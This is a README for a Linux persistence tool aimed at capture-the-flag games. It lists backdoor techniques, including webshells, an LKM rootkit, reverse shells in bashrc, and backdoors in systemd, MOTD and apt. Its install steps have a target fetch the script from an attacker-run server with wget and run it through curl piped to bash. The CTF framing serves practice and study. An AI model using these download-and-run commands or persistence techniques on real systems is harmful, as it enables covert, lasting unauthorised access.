DynastyPersist: A Linux persistence tool
DynastyPersist
A CTF Tool for Linux persistence (KOTH, Battlegrounds)
A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.
Features
-
SSH Key Generation: Automatically generates SSH keys for covert access.
-
Cronjob Persistence: Sets up cronjobs for scheduled persistence.
-
Custom User with Root: Creates a custom user with root privileges.
-
RCE Persistence: Achieves persistence through remote code execution (php webshell).
-
LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.
-
Bashrc Persistence: Modifies user-specific shell initialization files for persistence (aliases / reverse shells).
-
Systemd Service for Root: Sets up a systemd service for achieving root persistence.
-
LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.
-
Backdooring Message of the Day / Header: Backdoors system message display for covert access.
-
Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.
-
Backdoors APT Command: Backdoors apt command to pop up a shell.
Installation
- Clone this repository to your local machine:
$ git clone https://github.com/Trevohack/DynastyPersist.git
$ python3 -m http.server 8080
root@tyler.thm~$ cd /opt && wget -c [ATTACKER-IP]:8080/DynastyPersist && cd DynastyPersist && chmod +x dynasty.sh && ./dynasty.sh <ATTACKER_IP> <PORT>
- One linear
curl -sSL [ATTACKER_IP]:8080/DynastyPersist/dynasty.sh <ATTACKER_IP> <PORT> | bash
Copyright (C) 2024
Source: https://github.com/Trevohack/
